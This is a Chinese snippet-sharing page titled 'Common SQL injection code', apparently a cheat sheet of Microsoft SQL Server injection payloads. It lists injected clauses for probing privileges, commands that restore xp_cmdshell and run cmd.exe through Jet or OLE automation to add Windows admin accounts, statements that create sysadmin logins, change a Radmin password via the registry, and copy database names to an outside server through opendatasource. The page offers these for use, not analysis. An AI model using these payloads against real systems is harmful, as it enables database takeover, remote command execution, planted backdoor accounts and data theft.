[SQL] 常用SQL注入代码 →→→→→进入此内容的聊天室

来自 , 2019-12-31, 写在 SQL, 查看 124 次.
URL http://www.code666.cn/view/aba54c23
  1. //看看是什么权限的
  2. AND 1=(SELECT IS_MEMBER('db_owner'))
  3. AND CHAR(124)%2BCast(IS_MEMBER('db_owner') AS VARCHAR(1))%2Bchar(124)=1 ;--
  4.  
  5. //检测是否有读取某数据库的权限
  6. AND 1= (SELECT HAS_DBACCESS('master'))
  7. AND CHAR(124)%2BCast(HAS_DBACCESS('master') AS VARCHAR(1))%2Bchar(124)=1 --
  8.  
  9.  
  10. 数字类型
  11. AND CHAR(124)%2Buser%2Bchar(124)=0
  12.  
  13. 字符类型
  14. ' and char(124)%2Buser%2Bchar(124)=0 and ''='
  15.  
  16. 搜索类型
  17. ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
  18.  
  19. 爆用户名
  20.  AND user>0
  21. ' and user>0 and ''='
  22.  
  23. 检测是否为SA权限
  24. AND 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
  25. AND CHAR(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) AS VARCHAR(1))%2Bchar(124)=1 --
  26.  
  27. 检测是不是MSSQL数据库
  28. AND EXISTS (SELECT * FROM sysobjects);-- 
  29.  
  30. 检测是否支持多行
  31. ;DECLARE @d INT;-- 
  32.  
  33. 恢复 xp_cmdshell
  34. ;EXEC master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
  35.  
  36.  
  37. SELECT * FROM openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 
  38.  
  39. //-----------------------
  40. //      执行命令
  41. //-----------------------
  42. 首先开启沙盘模式:
  43. EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  44.  
  45. 然后利用jet.oledb执行系统命令
  46. SELECT * FROM openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
  47.  
  48. 执行命令
  49. ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',NULL, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
  50.  
  51. EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
  52.  
  53. 判断xp_cmdshell扩展存储过程是否存在:
  54. http://192.168.1.5/display.asp?keyno=188 AND 1=(SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
  55.  
  56. 写注册表
  57. EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  58.  
  59. REG_SZ
  60.  
  61. 读注册表
  62. EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
  63.  
  64. 读取目录内容
  65. EXEC master..xp_dirtree 'c:\winnt\system32\',1,1
  66.  
  67.  
  68. 数据库备份
  69. backup database pubs to disk = 'c:\123.bak'
  70.  
  71. //爆出长度
  72. And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
  73.  
  74.  
  75.  
  76. 更改sa口令方法:用sql综合利用工具连接后,执行命令:
  77. exec sp_password NULL,'新密码','sa'
  78.  
  79. 添加和删除一个SA权限的用户test:
  80. exec master.dbo.sp_addlogin test,ptlove
  81. exec master.dbo.sp_addsrvrolemember test,sysadmin
  82.  
  83. 删除扩展存储过过程xp_cmdshell的语句: 
  84. exec sp_dropextendedproc 'xp_cmdshell'
  85.  
  86. 添加扩展存储过过程
  87. EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll
  88. GRANT exec On xp_proxiedadata TO public 
  89.  
  90.  
  91. 停掉或激活某个服务。 
  92.  
  93. exec master..xp_servicecontrol 'stop','schedule'
  94. exec master..xp_servicecontrol 'START','schedule'
  95.  
  96. dbo.xp_subdirs
  97.  
  98. 只列某个目录下的子目录。
  99. xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
  100.  
  101. dbo.xp_makecab
  102.  
  103. 将目标多个档案压缩到某个目标档案之内。
  104. 所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
  105.  
  106. dbo.xp_makecab
  107. 'c:\test.cab','mszip',1,
  108. 'C:\Inetpub\wwwroot\SQLInject\login.asp',
  109. 'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
  110.  
  111. xp_terminate_process
  112.  
  113. 停掉某个执行中的程序,但赋予的参数是 Process ID。
  114. 利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
  115.  
  116. xp_terminate_process 2484
  117.  
  118. xp_unpackcab
  119.  
  120. 解开压缩档。
  121.  
  122. xp_unpackcab 'c:\test.cab','c:\temp',1
  123.  
  124.  
  125. 某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
  126.  
  127. create database lcx;
  128. Create TABLE ku(name nvarchar(256) null);
  129. Create TABLE biao(id int NULL,name nvarchar(256) null);
  130.  
  131. //得到数据库名
  132. insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;DATABASE=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
  133.  
  134. //sql/1215

回复 "常用SQL注入代码 "

这儿你可以回复上面这条便签

captcha